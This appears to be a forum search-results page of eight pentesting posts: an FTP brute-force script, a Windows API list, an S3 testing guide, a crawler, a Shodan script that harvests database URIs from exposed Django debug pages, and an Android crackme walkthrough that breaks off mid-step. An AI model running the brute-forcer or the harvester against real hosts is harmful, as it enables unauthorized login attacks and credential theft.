Jump to content
×
×
  • Create New...

Search the Community

Showing results for tags 'pentesting'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • HOME
    • Shell_Meet
    • Shell_Talk
    • Board Meet
    • Announcements and Updates
    • Shell_Update
    • Pending Approvals
    • Member Introductions
    • Shell_Crew Support
  • HACKING & EXPLOITATION
    • Ctf Updates & Walkthroughs
    • Latest CVE-Info
    • Android/IOS Pentesting
    • Reverse Engineering
    • IoT Exploitation
    • Malware Analysis
    • API Pentesting
    • Cloud Security
    • Off-topic Lounge
  • CAREER
    • Internships
    • Career Discussion
    • Mentorship
    • Career Guidance
  • BUG BOUNTY
    • P5 (Informational Bugs)
    • P4 (Low-Level Bugs)
    • P3-P2 (High-Level Bugs)
    • P2-P1 (Critical Bugs)
    • Vulnerability Chaining
    • Report Writing
    • Personal Hunting Methodology
  • PROGRAMMING
    • Front-End Development
    • Scripting
    • Backend-Development
    • Application Development
    • Linux Kernel and OS Developers
    • Hardware Programming
    • DevOps
    • Queries Assessment
  • PROFESSIONAL CYBERSEC
    • Penetration Testing (Risk Assessment)
    • Red Teaming (Risk Assessment)
    • Blue Teaming (Risk Assessment)
    • Exploit Development (Risk Assessment)
    • OSINT-External and Internal (Threat Intelligence)
    • IOC (Threat Intelligence)
    • Awareness (Reinforcement)
    • Digital Forensics (Security Operations)
    • SOC & SIEM
  • Bug-Hunters's Resources
  • Open Source Contribution's Topics
  • Pentesting's Resources
  • SDR & AutoMobile Pentesting's Topics
  • Networking's Topics
  • Networking's Network Resources

Blogs

  • Open Source Contribution's Blogs

Categories

  • Bug-Hunt
  • Penetration Testing
  • Blue-Teaming

Product Groups

There are no results to display.

Categories

  • Pentesting
  • Bug-POC Videos
  • CTF-Walkthrough
  • Scripting
  • Bug-Hunters's Videos
  • SDR & AutoMobile Pentesting's Videos
  • Networking's Videos

Categories

  • Pentesting
  • Bug-Hunting
  • SDR & AutoMobile Pentesting's Tutorials

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


About Me

Found 8 results

  1. #!/usr/bin/python3 """ FTP-Bruteforcer 4 FXP-TERMiNAL.iNFO by SpliTerZ.tw!XX Faster than an ICE """ import socket import sys import threading import time def CheckForLogin(target,username,password): sock = socket.socket() sock.settimeout(0.45) try: server = (target,21) user = "USER "+username+"\r\n" pwd = "PASS "+password+"\r\n" sock.connect(server) sock.recv(4096) sock.sendall(user.encode()) sock.recv(4096) sock.sendall(pwd.encode()) answer = sock.recv(4096).decode('utf-8') if "230" in answer: open('bruted_ftp','a').write(target+":21 "+username+":"+password+"\n") print("[x][x][x][x][x] Success on IP: "+target+"![x][x]\n") sock.recvmsg(4096) elif "530" in answer: sock.close() sock.close() except: print("Login failed!\n") pass if sys.argv[1]: hosts = open(sys.argv[1]).read().splitlines() usernames = sys.argv[2].split(",") passwords = open(sys.argv[3]).read().splitlines() for host in hosts: for user in usernames: for password in passwords: T = threading.Thread(target=CheckForLogin,args=(host,user,password,)) if threading.active_count() <= int(sys.argv[4]): T.start() else: time.sleep(0.3) T.start() T.join() exit() Usage: python/python3 ftp-brute.py hostlist.txt user1,user2,user3,user4,... passwords.txt threadcount
  2. Hi Guys . This is my first writeup in shell crew , So plz ignore my grammertical and spelling mistake😝... So many newbie when they come to cybersec field and ask to anyone how to start then , every experience person says , complete your basic . That's totally correct to clear the basic because its helps to understand and figure out cybersecurity stuffs in future.... So , the problem is that almost no will come and personally teach you the basic, and Don't know that what are the topics that he/she should to clear the basic ... Now many people will say that everything is already available on internet, but there you will not can get in proper categories manner or step by step process So, to help new people in Cyber sec i made a github repo where i made alll the basic in step by step manner with lessons Its just a small contribution by me ..........i know people there doing more better then me but i blv if even one person get help by my repo . That's enough for me My repo - https://github.com/rhonnysharma/Beginner Ok Now lets assume you are that person why cleared all your basic thet you can vist this repo - https://github.com/rhonnysharma/Web-Pentesting In my repo you will get all the latest - Checklist, latest bypass payload, roadmap etc that will be from twitter-Instragram-various infosys writeups....... Benifits---> No need to figure out latesr tips, payload methods etc from twitter-Instragram-various infosys writeups. Get ecerything from one place Thanks For Reading 😛
  3. In the Windows environment, hackers must be able to program low-level APIs. These widely used APIs have been grouped into seven categories to help readers gain a better understanding of the Windows API commonly used by hackers and to promote potential queries using API methods. We hope this will be beneficial to everyone’s learning. Process Create Process -- CreateProcess("C:\\windows\\notepad.exe",0,0,0,0,0,0,0,&si,&pi); WinExec("notepad",SW_SHOW); ShellExecute(0,"open","notepad","c:\\a.txt","",SW_SHOW); ShellExecuteEx(&sei); Traverse the process: CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); Process32First(hsnap,&pe32); Process32Next(hsnap,&pe32); Terminate the process: ExitProcess(0); TerminateProcess(hProc,0); Open process: OpenProcess(PROCESS_ALL_ACCESS,0,pid);\ Get process ID : GetCurrentProcesssId(); Get the path of the process executable file: GetModuleFileName(NULL,buf,len); GetProcessImageFileName(hproc,buf,len); Traverse process module information: CreateToolhelp32Snapshot(TH32CS_SNAPMODILE,pid); Module32First(hsnap,&mdl32); Module32Next(hsnap,&mdl2); Get the handle of the specified module: GetModuleHandle("kernel32.dll"); Get the function address in the module: GetProcessAddr(hmdl,"MessageBox"); Load DLL dynamically : LoadLibrary("user32.dll"); Uninstall the DLL : FreeLibrary(hDll); Get process command line parameters: GetCommandLine(); The 4- byte address after the GetCommandLine function address of any process is offset by one byte is the command line address. Read and write remote process data: ReadProcessMemory(hproc,baseAddr,buf,len,&size); WriteProcessMemory(hproc,baseAddr,buf,len,&size); Request memory: VirtualAlloc(0,size,MEM_COMMIT, PAGE_EXECUTE_READWRITE); VirtualAllocEx(hproc,0,size,MEM_COMMIT, PAGE_EXECUTE_READWRITE); Modify memory attributes: VirtualProtect(addr,size,PAGE_EXECUTE_READWRITE,&oldAddr); VirtualProtectEx(hproc,addr,size,PAGE_EXECUTE_READWRITE,&oldAddr); Free up memory: VirtualFree( addr, size, MEM_RELEASE); VirtualFreeEx(hproc, addr, size, MEM_RELEASE); Obtain the system version (Win NT/2K/XP<0x80000000) : getVersion(); Priority of read and write processes: SetPriorityClass(hproc,Normal); GetPriority(hproc); SetProcessPriorityBoost(hproc,true); GetProcessPriorityBoost(hproc,pBool); Two, thread Create a thread ( the thread function of CreateThread calls strtok , rand, etc. need to use _endthread() to release memory ) : CreateThread(0,0,startAddr,¶,0,&tid); _beginthread(startAddr,0,0); _beginthreadex(0,0,startAddr,0,0,&tid); CreateRemoteThread(hproc,0,0,func,¶,0,&tid); Get thread ID : GetCurrentThreadId(); Close the thread handle (reduce the number of times the kernel object is used to prevent memory leaks): CloseHandle(hthread); Suspend and activate threads ( maintenance pause times ) : SuspendThread(hthread); ResumeThread(hthread); Get the thread exit code: GetExitCode(hthread,&code); Wait for the thread to exit ( thread trusted state or timeout ) : WaitForSignleObject(htread,1000); WaitForMultipleObjects(num,handles,true,INFINITE); Traverse threads: CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0); Thread32First(hsnap,&mdl32); Thread32Next(hsnap,&mdl2); Get the thread function entry: ZwQueryInfomationThread(hthread,ThreadQuerySetWin32StartAddress,&buf,4,NULL); Open thread: OpenThread(THREAD_ALL_ACCESS,false,&tid); Get the module to which the thread function address belongs: GetMappedFileName(hproc,addr,buf,256); Read and write thread priority: SetThreadPriority(hthread,Normal); GetThreadPriority(hthread); SetThreadPriorityBoost(hproc,true); GetThreadPriorityBoost(hproc,pBool); Terminate the thread: ExitThread(5); TerminateThread(hthread,5); Thread synchronization critical section object: InitializeCriticalSection(&cs); EnterCriticalSection(&cs); LeaveCriticalSection(&cs); DeleteCriticalSection(&cs); Thread synchronization event kernel object: OpenEvent(EVENT_ALL_ACCESS,false,name); CreateEvent(NULL,false,true,NULL); WaitForSingleObject(hevnt,INFINITE); SetEvent(hevnt); ResetEvent(hevnt); Thread synchronization mutex kernel object: CreateMutex(NULL,false,NULL); WaitForSingleObject(hmutex,INFINITE); ReleaseMutex(hmutex); OpenMutex(MUTEX_ALL_ACCESS,false,name); Third, the registration form Create Key: RegCreateKeyEx(HKEY_CURRENT_USER,"TestNewKey",0,0,REG_OPTION_VOLATILE,KEY_ALL_ACCESS,0,&subkey,&state); Open key: RegCreateKeyEx(HKEY_CURRENT_USER,"Control Panel",0,KEY_ALL_ACCESS,&subkey); Close button: RegCloseKey(hkey); Traverse keys: RegEnumKeyEx(hsubkey,index,keyname,&nameSize,0,0,0,&time); FileTimeToSystemTime(&time,&systime); RegQueryInfo(hsubkey,0,0,0,&count,0,0,0,0,0,0,0); Delete key: RegDeleteKeyEx(hmainkey,subkeyName); Create value: RegSetValueEx(hsubkey,"test",0,REG_WORD,(BYTE*)&value,4); Traverse value: RegEnumValue(hsubkey,index,name,&nameSize,0,&type,valuebuf,valueLen); RegQueryValueEx(hsubkey,name,0,type,buf,&size); Delete value: RegDeleteValue(hsubkey,valuename); Four, document Create / Open File -- CreateFile("a.txt",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); Set the file pointer: SetFilePointer(hFile,0,NULL,FILE_END); Read and write files: ReadFile(hFile,buf,len,&size,0); WriteFile(hFile,buf,len,&size,0); Forcing the file to be written to the disk and clearing the file high-speed buffer: FlushFileuffers(hFile); [ Solution ] Lock file area: LockFile(hFile,0,0,100,0); UnlockFile(hFile,0,0,100,0); Copy files : CopyFi le(src,des,true); CopyFi leEx(src,des,func,¶,false, COPY_FILE_FAIL_IF_EXISTS); Move files: MoveFile(src,des); MoveFileEx(src,des,false); MoveFileWithProgress(src,des,fun,¶, MOVEFILE_COPY_ALLOWED); Delete Files: DeleteFile(filename); Get the file type (FILE_TYPE_PIPE) : GetFileType(hFile); Get file size: GetFileSize(hFile,&high); Get file attributes ( for example, FILE_ATTRIBUTE_DIRECTORY for & operation ) : GetFileAttributes(hFile); Traverse the file: FindFirstFile(nameMode,&wfd); FindNextFile(hFile,&wfd); Create a pipeline: CreatePipe(&hRead,&hWrite,&sa,0); Create a memory mapped file: CreateFile("d:\\a.txt",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,"myMap"); Load the memory mapped file: MapViewOfFile(hmap,FILE_MAP_ALL_ACCESS,0,0,0); Open the memory mapped file: OpenFileMapping(FILE_AMP_ALL_ACCESS,false,"myMap"); Unload the memory mapped file: UnmapViewOfFile(baseAddr); Force write memory mapped file to disk: FlushViewOfFile(baseAddr,len); Create a folder ( only one level can be created ) : CreateDirectory("D:\\a",NULL); CreateDirectory("C:\\a","D:\\b",NULL); Delete folder ( only empty folder can be deleted ) : RemoveDirectory("C:\\a"); Logical drive detection: GetLogicalDrives(); GetLogicalDriveStrings(len,buf); Get the drive type (DRIVE_CDROM) : GetDriveType("D:\\"); Five,The Network Open the network resource enumeration process ( winnetwk.h , Mpr.lib 😞 WNetOpenEnum(RESOURCE_GLOBAL,RESOURCETYPE_ANY,0,NULL,hnet); Enumerate network resources: WNetEnumResource(hnet,&count,pNetRsc,&size); Turn off the network resource enumeration process: WNetCloseEnum(hnet); Open and close the WinSocket library: WSAStartup(version,&wsa); WSACleanup(); Create a socket: socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); Bind the socket IP and port: bind(sock,&addr,len); Monitor TCP connection: listen(sock,10); Receive TCP connection request: accept(sock,&addr,&len); Client connection: connect(sock,&addr,len); Send TCP data: send(sock,buf,len,0); Receive TCP data: recv(sock,buf,len,0); Send UDP data: sendto(sock,buf,len,0,&addr,len); Receive UDP data: recvfrom(sock,buf,len,0,&addr,&len); 6-Service Open the SCM Service Control Manager: OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS); Create service: CreateService(mgr,"MyService"," MyService",SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,path,NULL,NULL,NULL,NULL,NULL); Open the service object: OpenService(mgr," MyService ",SERVICE_START); Start the service: StartService(serv,0,NULL); Query service status: QueryServiceStatus(serv,&state); Close the service handle: CloseServiceHandle(hdl); Connect to SCM : StartServiceCtrlDispatcher(DispatchTable); Register service control function: RegisterServiceCtrlHandler("MyServicer",ServiceCtrl); Set service status: SetServiceStatus(hss,&ServiceStatus); Control service: ControlService(serv,SERVICE_CONTROL_STOP,&state); Delete service: DeleteService(serv); Traverse service: EnumServicesStatus(hscm,SERVICE_WIN32|SERVICE_DRIVER,SERVICE_STATE_ALL,&srvSts,len,&size,&count,NULL); Query service configuration: QueryServiceConfig(hserv,&srvcfg,size,&size); 7-News Send a Messsage: SendMessage(HWND_BROADCAST,WM_LBUTTONDOWN,0,0); Receive messages: GetMessage(&msg,NULL,0,0); Delivery message: PostMessage(HWND_BROADCAST,WM_LBUTTONDOWN,0,0); Get news: PeekMessage(&msg,NULL,0,0); Conversion message: TranslateMessage (&msg); Distribute messages: DispatchMessage (&msg); Waiting for news: WaitMessage(); Send exit message: PostQuitMessage(0); Install the message hook: SetWindowsHookEx(WH_KEYBOARD,keyBoardProc,0,tid); Uninstall the message hook: UnhookWindowsHookEx(hhk);
  4. AWS PENETRATION TESTING PART 1. S3 BUCKETS - Amazon Web Services (AWS) provides some of the most powerful and robust infrastructure for modern web applications. As with all new functionality on the web, new security considerations inevitably arise. For penetration testers, a number of AWS services can pose obscure challenges at times. In this series of blog posts, we will discuss AWS services in detail, common vulnerabilities and misconfigurations associated with them, and how to conduct sufficient security tests for each service with the aid of automated tools. This article is intended to be used by penetration testers with our AWS BurpSuite extension to easily assess the security of AWS S3 buckets. We’ve released our BurpSuite plugin AWS Extender which can identify and assess buckets discovered from proxy traffic. It also has been extended to identify identity pools, and Google Cloud and Microsoft Azure services as well. Download: The AWS Extender Burp Plugin Download: The AWS Extender CLI AMAZON SIMPLE STORAGE SERVICE (S3)- Amazon S3 is an extremely popular object storage service that provides scalable storage infrastructure. And despite the possibility of hosting static websites, S3 by itself does not support code execution or any programmatic behavior. It only provides storage through the REST, SOAP, and BitTorrent web interfaces to read, upload, and delete static files. Amazon provides different mechanisms of access control for S3 buckets. That includes access control lists (ACLs), bucket policies, as well as IAM policies. By default, an S3 bucket is assigned a default ACL upon creation that grants the bucket owner full control over the bucket. S3 PENETRATION TESTING BASICS - There’s a few key concepts that any web application penetration tester should be aware of: All S3 buckets share a global naming scheme. Bucket enumeration is not avoidable. All S3 buckets have a DNS entry: [bucketname].s3.amazonaws.com It’s generally easiest to access a bucket over it’s HTTP interface (https://[bucketname].s3.amazonaws.com) or to use the more powerful AWS CLI: apt-get install awscli aws s3 ls s3://mybucket S3 COMMON VULNERABILITIES - If you’re new to AWS or S3, there are a few common vulnerabilities you should be aware of: Unauthenticated Bucket Access – As the name implies, an S3 bucket can be configured to allow anonymous users to list, read, and or write to a bucket. Semi-public Bucket Access – An S3 bucket is configured to allow access to “authenticated users”. This unfortunately means anyone authenticated to AWS. A valid AWS access key and secret is required to test for this condition. Improper ACL Permissions – The ACL of the bucket has it’s own permissions which are often found to be world readable. This does not necessarily imply a misconfiguration of the bucket itself, however it may reveal which users have what type of access. ACCESS CONTROL LISTS (ACLS) - S3 access control lists can be applied at the bucket level as well as at the object level. They generally support the following set of permissions: READ At the bucket level, this allows the grantee to list the objects in a bucket. At the object level, this allows the grantee to read the contents as well as the metadata of an object. WRITE At the bucket level, this allows the grantee to create, overwrite, and delete objects in a bucket. READ_ACP At the bucket level, this allows the grantee to read the bucket’s access control list. At the object level, this allows the grantee to read the object’s access control list. WRITE_ACP At the bucket level, this allows the grantee to set an ACL for a bucket. At the object level, this allows the grantee to set an ACL for an object. FULL_CONTROL At the bucket level, this is equivalent to granting the “READ”, “WRITE”, “READ_ACP”, and “WRITE_ACP” permissions to a grantee. At the object level, this is equivalent to granting the “READ”, “READ_ACP”, and “WRITE_ACP” permissions to a grantee. A grantee can be an individual AWS user referenced by his canonical user ID or email address or one of the following predefined groups: The Authenticated Users Group Represents all AWS users and is referenced by the URI “http://acs.amazonaws.com/groups/global/AuthenticatedUsers“. The All Users Group Represents all users (including anonymous ones) and is referenced by the URI “http://acs.amazonaws.com/groups/global/AllUsers”. The Log Delivery Group Relevant only for access logging and is referenced by the URI “http://acs.amazonaws.com/groups/s3/LogDelivery”. The following is a sample ACL: <?xml version="1.0" encoding="UTF-8"?> <AccessControlPolicy xmlns="http://s3.amazonaws.com/doc/2006-03-01/"> <Owner> <ID>*** Owner-Canonical-User-ID ***</ID> <DisplayName>owner-display-name</DisplayName> </Owner> <AccessControlList> <Grant> <Grantee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="Canonical User"> <ID>*** Owner-Canonical-User-ID ***</ID> <DisplayName>display-name</DisplayName> </Grantee> <Permission>FULL_CONTROL</Permission> </Grant> </AccessControlList> </AccessControlPolicy> All of the aforementioned permissions are currently covered by the AWS Extender Burp extension. Namely, the following tests are performed once an S3 bucket is identified: The extension attempts to list objects hosted in the bucket (READ). The extension attempts to upload a “test.txt” file to the bucket (WRITE). The extension attempts to retrieve the access control list of the bucket (READ_ACP). The extension attempts to set the access control list of the bucket (WRITE_ACP) without actually changing it. Note: Similar tests are conducted for every identified S3 object. BUCKET POLICIES - Using a bucket policy, a bucket owner can specify what a principal can perform on a specific resource. Where a principal can be any AWS user/group or all users including anonymous ones, an action can be any predefined permission supported by bucket policies, and a resource can be the entire bucket or a specific object. The following is a sample bucket policy expressed in the JSON format: { "Version":"2012-10-17", "Statement": [ { "Effect":"Allow", "Principal": "*", "Action":["s3:GetObject"], "Resource":["arn:aws:s3:::examplebucket/*"] } ] } This policy allows the “s3:GetObject” action on the resource “arn:aws:s3:::examplebucket/” for a wildcard principal “”. This is effectively equivalent to granting the “READ” permission to the All Users group on the “examplebucket” S3 bucket using an access control list (ACL). The following permissions are currently covered by the AWS Extender Burp extension: s3:ListBucket s3:ListMultipartUploadParts s3:GetBucketAcl s3:PutBucketAcl s3:PutObject s3:GetBucketNotification s3:PutBucketNotification s3:GetBucketPolicy s3:PutBucketPolicy s3:GetBucketTagging s3:PutBucketTagging s3:GetBucketWebsite s3:PutBucketWebsite s3:GetBucketCORS s3:PutBucketCORS s3:GetLifecycleConfiguration s3:PutLifecycleConfiguration 3:PutBucketLogging Part 2 of the AWS series will cover more on S3 permissions including IAM and access tokens, as well as considerations for EC2, Cognito authentication and more. So,this is a little discription how to check S3 Bucket Misconfigeration Vulnerability in a Cloud System based Application. And I know it's a bit tricky but ya eventually you will start getting as soon as you take interest in reading. So,this is the end and furthur we will be looking on many such Cloud Pentesting Techniques. Read,React,Comment & Share.
  5. Hey Guys! I am Venom! I hope you all are fine! Today I am sharing the web crawler script written in python ! So let's begin! import requests # using requests library for getting the source code from site. import re # using re module for getting a tags from urllib.parse import urljoin # urlparse to parse the url from bs4 import BeautifulSoup # using bs4 to parse code using html parser urls = [] # to store the urls used target_links = [] url = [] target = input("[+] Enter the url: ") # taking target url as user input def extract(tar): # making a function extract with a value tar try: # try and except loop in case we got some status or http error response = requests.get(target) # getting the url content using get requests soup = BeautifulSoup(response.content, 'html.parser') # parsing the content return re.findall('(?:href=")(.*?)"', str(soup)) # find urls using the regex pattern except: pass # if any error occurs then just pass the data! def crawl(path): # making another function crawl which takes an argument links = extract(path) # now the function extract with get all the links from the argument given which is target in our case for link in links: # using for loop to format the urls and crawl them again one by one url = urljoin(path, link) # if url is not complete then joining the url with target if "#" in url: # if else loop url = url.split("#")[0] # if there is a # in url then just split the url and print the first path if link in url and url not in target_links: # if the link is in url list and url is not in the target list then target_links.append(url) # append the url to target link urls.append(target_links) print("[+] " + url) # printing the url which we have found! crawl(url) # now again running the crawl loop on the url! crawl(target) # running the crawl function with target url as argument!
  6. CTF(Capture The Flag) - Hack the Box 👩‍💻♥️💫✨ If you are looking for opportunities to expand your horizons and learn more about digital security. Then CTF is probably the Stuff you should give it a Try & HTB(Hack the Box) is one such example. Here I'm going to Share the Top Pentesting Labs you should Venture and Aim for if You are having an higher level of Appetite. ~ With Best Regards MR.MIME ✌️💫 Happy Learning
  7. Let’s install the shodan module by executing the following command. pip install shodan import shodan SHODAN_API_KEY = "YOUR_SHODAN_API" api = shodan.Shodan(SHODAN_API_KEY) words = open("bug-bounty-wordlist.txt","r") django_debug_list = open("django-debug-list.txt","w") for word in words.readlines(): query = "html:'URLconf defined' ssl:"+word.strip('\n') try: results = api.search(query) print('Results found: {}'.format(results['total'])) for result in results['matches']: print(word) print('IP: {}'.format(result['ip_str'])) port = result['port'] if port in [80,443]: if port==443: ip = "https://"+result['ip_str'] else: ip = "http://"+result['ip_str'] else: ip = "http://"+result['ip_str']+":"+str(port) django_debug_list.write(ip+'\n') print('') except Exception as e: print(e) This shodan python module is an official wrapper around the shodan API. We can use all the filters specified in the shodan docs via this module. You need to get an api key in shodan.io by creating an account. Every year in November month as a black friday offer shodan provides a member account for $5. You can afford it. In the above program, we have opened a domain wordlist file and iterate it over the loop then construct the shodan query which can be passed to shodan search api function which returns a list of dictionaries. You can check the IP address manually or you can automate that process also. Okay Let’s automate import requests,re django_debug_list = open("django-debug-list.txt","w") regex = r"(?:mongodb|redis):\/\/" for ip in django_debug_list.readlines(): try: response = requests.post(url=ip.rstrip("\n")+"/admin",data= {},verify=False) if re.search(regex,response.content): print("Mongodb/Redis URI Found") except Exception as e: print(e) Here you can see regex to match mongodb:// or redis:// or both. You can see a function rstrip that is used to remove something right in the strings, here I removed the new line (\n) character. I passed a parameter verify=False that means I tell the program to don’t verify the ssl certificate of the server. You can use your own regex to match something else other than mongodb/redis URI.
  8. Mobile applications often process sensitive data, which is the key target of many cybercriminals. When working with such data, developers must do their best to ensure its protection. One way to improve the security of a mobile app is to perform mobile application penetration testing. To find flaws in their application code, developers need at least basic skills in reverse engineering and pentesting Android applications. In this article, we discuss different methods an attacker might use to hack your apps. We also explain how challenges from the Open Web Application Security Project (OWASP) Mobile Security Testing Guide (MSTG) can help you in Android application security testing and what tools you can use to solve them. Strengthen your app’s security with reverse engineering Android is quite a developer-friendly operating system (OS). Unlike other mobile OSs, Android is an open-source platform on which you can activate Developer Options and sideload applications without jumping through too many hoops. Furthermore, Android allows developers to explore its source code at the Android Open Source Project and to modify operating system functionality however they like. However, working with Android applications also means you’ll need to deal with Java bytecode and Java native code. Some developers may see this as a disadvantage. Android developers use the Java Native Interface to improve application performance, support legacy code, and, of course, confuse those who try to look inside their apps. When building mobile applications, one of the top priorities for a development team is to ensure a high level of data security. Developers should do their best to prevent cybercriminals from getting access to a user’s sensitive information. Some try improving the security of their mobile apps with the help of third-party solutions. However, when working with third-party products, it’s critical to configure them properly. A misconfigured or improperly used solution will be of no help, no matter how expensive it is. Others try to hide the application’s functionality and data in the native layer. In some cases, they build Android applications in such a way that execution jumps between the native layer and the runtime layer. There are also developers who use more sophisticated methods, such as reverse engineering. This technique is quite helpful when it comes to ensuring proper protection of an application’s sensitive data. That’s why it’s best for a developer to have at least some basic skills in reverse engineering: Unpacking APK files Patching .smali files Patching .so libraries Using debugging tools Working with frameworks for dynamic code analysis With these skills and expertise, mobile app developers will have a better chance of detecting code flaws that might be used by attackers. For instance, in order to break into your application, hackers may use the same techniques that quality assurance (QA) specialists use when they test an application’s security and performance: Dynamic analysis is used to find possible ways to manipulate application data when the application is running. For example, hackers may try to crack your app by skipping the multi-factor code check during login. Static analysis is used for studying an already packaged application and detecting code weaknesses without having direct access to the source code. With static analysis, we don’t look at the application’s behavior at runtime, as we do during dynamic analysis. Hackers may use static analysis to detect the use of a weak encryption algorithm, for instance. A basic toolset for Android reverse engineering Before you start solving the OWASP CrackMe challenges for Android developers, you need to make sure you have two things: Knowledge of Android environments. You need to have some experience working with Java and Linux environments as well as with Android kernels. The right set of tools. Working with bytecode and native code running on a Java virtual machine (JVM) requires specific tools. In this section, we list and briefly describe tools that you can use to solve the OWASP CrackMe challenges and upgrade your reverse engineering skills. Note: For the purposes of this article, we’ve chosen only tools and frameworks that are either free or have free trial versions. Android Studio — The official integrated development environment (IDE) for Android. This is the primary IDE for building native Android apps; it includes an APK analyzer, code editor, visual layout editor, and more. In particular, we’ll use the command-line Android Debug Bridge (adb) tool. Apktool — This is a popular free tool for reverse engineering closed, third-party, and binary Android applications. It can disassemble Java bytecode to the .smali format as well as extract and disassemble resources from APK archives. Also, you can use Apktool for patching and changing the manifest file. Note: Application code is stored in the APK file, which contains the .dex file with Dalvik binary bytecode. Dalvik is a data format understandable by the Android platform but completely unreadable for humans. So for a developer to be able to work with .dex files, they need to be converted to (and from) a readable format, such as .smali. Cutter — An open-source cross-platform framework that provides a customizable, easy-to-use reverse engineering platform. This framework is powered by radare2 and is supported by a large community of professional reverse engineers. Hex Workshop Editor — A popular set of Windows hexadecimal development tools. This toolset makes editing binary data nearly as simple as working with regular text documents. Hex Workshop Editor is commercial but has a free trial version. Note: Hex Workshop Editor can only be used on Windows. If you’re working with a Linux-based virtual machine, you can choose any Linux hex editor. dex2jar — A free tool for converting bytecode from the .dex format into Java class files. JD-GUI — One of the tools created by the Java Decompiler project. This graphical utility makes Java source code readable, displaying it as Java class files. Mobexler — An Elementary-based virtual machine for iOS and Android pentesting. Mobexler comes with a set of preinstalled tools and scripts for testing the security of a mobile app, including some of the tools from this list. Java Debugger (jdb) — A free command-line tool for debugging Java classes. Note: In Android applications, debugging can be performed on two layers: Runtime layer — Java runtime debugging can be performed with the help of the Java Debug Wire Protocol (JDWP). Native layer — Linux/Unix-style debugging can be performed based on ptrace. JDWP is a standard debugging protocol that helps the debugger communicate with the target JVM. This protocol is supported by all popular command-line tools and Java IDEs, including Eclipse, JEB, IntelliJ, and, of course, jbd. The JDWP debugger allows you to explore Java code, set breakpoints in Java methods, and check and modify both local and instance variables. It’s often used for debugging regular Android apps that doesn’t make many calls to native libraries. GNU Debugger (gdb) — A useful tool for analyzing an application’s code. We used these tools to solve two reverse engineering challenges for Android apps. In the next section, we’ll give you a basic Android pentesting tutorial based on the standard OWASP challenges. Solving UnCrackable Apps challenges We'll show you how to solve two OWASP MSTG CrackMe challenges: UnCrackable App for Android Level 1 and UnCrackable App for Android Level 2. These apps were specifically designed as reverse engineering challenges with secrets hidden in the code. Our task is to find these secrets. While solving these challenges, we’ll use static analysis for analyzing the decompiled code and dynamic analysis for modifying some of the application parameters. Solving UnCrackable App for Android Level 1 First, we need to look inside our training application. A regular Android application is, in fact, a properly packaged APK file containing all the data the application needs to operate normally. To look at the application from the inside and solve this challenge, we’ll need: adb for communicating with our mobile device and the training application Apktool for disassembling the APK files of our training app into separate .smali classes jdb for debugging our training app dex2jar for converting APK files to the JAR format JD-GUI for working with the JAR files Now let’s move on to solving the first challenge. We’ll begin by installing UnCrackable-Level1.apk on our device or emulator with the following command: $ adb install UnCrackable-Level1.apk We’ll solve this challenge and debug the Release Android app with the help of the jdb tool. Follow along to find the hidden secret. 1. Unpack the application and decode the manifest file using Apktool: $ apktool d -s UnCrackable-Level1.apk -o temp 2. Using a text editor, put the app into debugging mode by changing the manifest file and setting android:debuggable to "true": <application android:allowBackup="true" android:debuggable="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:theme="@style/AppTheme"> 3. Use Apktool to repack the APK file: $ apktool b temp -o UnCrackable-Level1-Repackage.apk 4. Resign the newly created APK file. You can do this using a bash script for resigning Android apps. 5. Install the new APK file on your device or emulator with the following command: $ adb install UnCrackable-Level1-Repackage-Resigned.apk At this point, we face the first big challenge. The UnCrackable App is designed to resist debugging mode. So when we enable it, the app simply shuts down. You’ll see a modal dialog with a warning. The dialog can be closed by tapping OK, but this will be your last action before the app is terminated. Fortunately enough, there’s a way to fix this. 6. Launch the application on your device or emulator in Wait For Debugger mode. This mode allows you to connect the debugger to the target application before the application runs its detection mechanism. As a result, the app won’t deactivate the debugging mode. Run the application in Wait For Debugger mode with this command: $ adb shell am start -D -n "owasp.mstg.uncrackable1/sg.vantagepoint.uncrackable1.MainActivity" 7. Now display the process IDs (PIDs) of all processes that run on the connected device: $ adb shell ps 8. And list only debuggable processes: $ adb jdwp 9. Open a listening socket on your host machine and forward its incoming TCP connections to the JDWP transport of a chosen debuggable process: $ adb forward tcp:4321 jdwp:PID 10. Note that attaching the debugger (in our case, jdb) will cause the application to resume from the suspended state, and we don’t want that. We need to keep the app suspended for a while to explore it in detail. To prevent the process from resuming, pipe the suspend command into jdb: < "%JAVA_HOME%\bin\jdb" -connect com.sun.jdi.SocketAttach:hostname=localhost,port=4321 Set uncaught java.lang.Throwable Set deferred uncaught java.lang.Throwable Initializing jdb ... < suspend All threads suspended. < 11. Now we need to bypass that moment when the application crashes in the runtime after you tap OK. Decompile the APK file to review the application code using dex2jar and JD-GUI: 1) Use the dex2jar tool to convert the original APK file to a JAR file: $ d2j-dex2jar.bat -f UnCrackable-Level1.apk 2) Using the JD-GUI tool, open the newly created JAR file: public class MainActivity extends Activity { private void a(String str) { AlertDialog create = new Builder(this).create(); create.setTitle(str); create.setMessage(“This is unacceptable. The app is now going to exit.”); create.setButton(-3, “OK”, new OnClickListener() { public void onClick(DialogInterface dialogInterface, int i) { System.exit(0); } }}; create,setCancelable(false); create.show(); } After reviewing the code, you’ll see that the MainActivity.a method displays the message: "This is unacceptable..." The MainActivity.a method creates an alert dialog and sets a listener class for the onClick event. The listener class has a callback method that shuts down the application when the user taps the OK button. To prevent a user from canceling the dialog, the system calls the setCancelable method. At this point, our best-case scenario is to suspend the application in a state where the secret string we’re looking for is stored in a plaintext variable. Unfortunately, that’s impossible unless you can figure out how the application detects root and tampering. 12. Try tampering with the runtime a little bit to bypass application termination. Set a method breakpoint on android.app.Dialog.setCancelable when the application is still suspended, then resume the app: All threads 